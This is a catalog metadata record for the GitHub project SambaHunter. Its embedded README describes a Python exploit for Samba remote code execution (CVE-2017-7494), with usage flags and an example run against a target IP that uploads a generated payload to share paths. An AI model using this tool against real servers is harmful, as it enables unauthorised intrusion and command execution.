{"id":13844332,"url":"https://github.com/brianwrf/SambaHunter","last_synced_at":"2025-07-11T22:31:43.119Z","repository":{"id":41086459,"uuid":"92845566","full_name":"brianwrf/SambaHunter","owner":"brianwrf","description":"It is a simple script to exploit RCE for Samba (CVE-2017-7494 ).","archived":false,"fork":false,"pushed_at":"2021-10-31T07:06:25.000Z","size":473,"stargazers_count":56,"open_issues_count":0,"forks_count":27,"subscribers_count":5,"default_branch":"master","last_synced_at":"2024-08-05T17:41:29.458Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/brianwrf.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2017-05-30T15:08:32.000Z","updated_at":"2023-09-28T10:41:48.000Z","dependencies_parsed_at":"2022-09-08T02:20:31.135Z","dependency_job_id":null,"html_url":"https://github.com/brianwrf/SambaHunter","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/brianwrf%2FSambaHunter","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/brianwrf%2FSambaHunter/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/brianwrf%2FSambaHunter/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/brianwrf%2FSambaHunter/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/brianwrf","download_url":"https://codeload.github.com/brianwrf/SambaHunter/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":225763338,"owners_count":17520439,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-04T17:02:40.485Z","updated_at":"2024-11-21T16:31:11.494Z","avatar_url":"https://github.com/brianwrf.png","language":"Python","funding_links":[],"categories":["Python (1887)","Python"],"sub_categories":[],"readme":"# SambaHunter\nIt is a simple script to exploit RCE for Samba (CVE-2017-7494).\n\nNow works with Python3. Many of the required Python2 libraries are deprecated (e.g. `commands`)\n\nAdded logging to show which shares are writeable. If 'Exploit Finished' appears but no shares are writeable, the exploit didn't work.\n\n# Requirements\n* sudo apt-get install smbclient\n* pip install pysmbclient\n\n# Usage\n```\n# python3 sambahunter.py -h\n\n\n  ____                  _           _   _             _            \n / ___|  __ _ _ __ ___ | |__   __ _| | | |_   _ _ __ | |_ ___ _ __ \n \\___ \\ / _` | '_ ` _ \\| '_ \\ / _` | |_| | | | | '_ \\| __/ _ \\ '__|\n  ___) | (_| | | | | | | |_) | (_| |  _  | |_| | | | | ||  __/ |   \n |____/ \\__,_|_| |_| |_|_.__/ \\__,_|_| |_|\\__,_|_| |_|\\__\\___|_|   \n                                                                   \n    # Exploit Author: avfisher (https://github.com/brianwrf)\n    # Samba 3.5.0 - 4.5.4/4.5.10/4.4.14 Remote Code Execution\n    # CVE-2017-7494\n    # Help: python sambahunter.py -h\n\nusage: sambahunter.py [-h] [-s SERVER] [-c COMMAND]\n\noptional arguments:\n  -h, --help            show this help message and exit\n  -s SERVER, --server SERVER\n                        Server to target\n  -c COMMAND, --command COMMAND\n                        Command to execute on target server\n ```\n \n # Example\n ```\n # python3 sambahunter.py -s 192.168.1.106 -c 'uname -a \u003e /tmp/u.txt'\n\n\n  ____                  _           _   _             _            \n / ___|  __ _ _ __ ___ | |__   __ _| | | |_   _ _ __ | |_ ___ _ __ \n \\___ \\ / _` | '_ ` _ \\| '_ \\ / _` | |_| | | | | '_ \\| __/ _ \\ '__|\n  ___) | (_| | | | | | | |_) | (_| |  _  | |_| | | | | ||  __/ |   \n |____/ \\__,_|_| |_| |_|_.__/ \\__,_|_| |_|\\__,_|_| |_|\\__\\___|_|   \n                                                                   \n    # Exploit Author: avfisher (https://github.com/brianwrf)\n    # Samba 3.5.0 - 4.5.4/4.5.10/4.4.14 Remote Code Execution\n    # CVE-2017-7494\n    # Help: python sambahunter.py -h\n\n[*] Exploiting RCE for Samba (CVE-2017-7494 )...\n[*] Server: 192.168.1.106\n[*] Samba version: Samba 4.3.8-Ubuntu\n[*] Generate payload succeed: /root/samba_14506.so\n[+] Brute force exploit: /volume1/samba_14506.so\n[+] Brute force exploit: /volume2/samba_14506.so\n[+] Brute force exploit: /volume3/samba_14506.so\n[+] Brute force exploit: /shared/samba_14506.so\n[+] Brute force exploit: /mnt/samba_14506.so\n[+] Brute force exploit: /mnt/usb/samba_14506.so\n[+] Brute force exploit: /media/samba_14506.so\n[+] Brute force exploit: /mnt/media/samba_14506.so\n[+] Brute force exploit: /var/samba/samba_14506.so\n[+] Brute force exploit: /tmp/samba_14506.so\n[+] Brute force exploit: /home/samba_14506.so\n[+] Brute force exploit: /home/shared/samba_14506.so\n[*] Exploit finished!\n ```\n![](https://raw.githubusercontent.com/brianwrf/SambaHunter/master/example.jpeg)\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fbrianwrf%2FSambaHunter","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fbrianwrf%2FSambaHunter","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fbrianwrf%2FSambaHunter/lists"}